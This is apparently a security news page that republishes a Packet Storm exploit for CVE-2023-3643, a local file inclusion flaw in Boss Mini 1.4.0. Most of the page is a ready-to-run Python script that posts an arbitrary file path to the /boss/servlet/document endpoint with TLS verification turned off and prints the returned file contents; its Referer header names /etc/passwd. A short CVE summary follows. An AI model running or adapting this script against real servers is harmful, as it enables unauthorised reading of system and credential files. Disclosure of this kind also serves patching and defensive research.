Security
Headlines
HeadlinesLatestCVEs

Headline

Boss Mini 1.4.0 Local File Inclusion

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

Packet Storm
#vulnerability#web#windows#git#auth#firefox
# Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Related news

CVE-2023-3643

A vulnerability was found in Boss Mini 1.4.0 Build 6221. It has been classified as critical. This affects an unknown part of the file boss/servlet/document. The manipulation of the argument path leads to file inclusion. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-233889 was assigned to this vulnerability.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution